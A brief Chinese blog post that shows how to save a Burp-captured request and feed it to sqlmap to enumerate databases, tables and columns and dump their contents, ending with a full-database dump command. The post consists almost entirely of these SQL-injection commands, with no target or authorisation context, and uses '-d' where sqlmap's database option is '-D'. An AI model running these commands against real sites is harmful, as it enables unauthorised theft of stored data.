版权声明:原创 多崎巡礼,未经许可禁止转载! https://blog.csdn.net/qq_42357070/article/details/82143307
burp抓包,将抓到数据存为 xxx.txt
爆数据库
sqlmap.py -r xxx.txt --dbs --batch
爆表名
sqlmap.py -r xxx.txt -d 数据库名 --table --batch
爆表中的字段
sqlmap.py -r xxx.txt -d 数据库名 -t 表名 --columns --batch
爆字段中的值
sqlmap.py -r xxx.txt -d 数据库名 -t 表名 -c '字段名' --dump --batch
更直接的爆破
sqlmap.py -r xxx.txt --dump --batch
这次时间稍长,爆破的时候可以小憩了。。。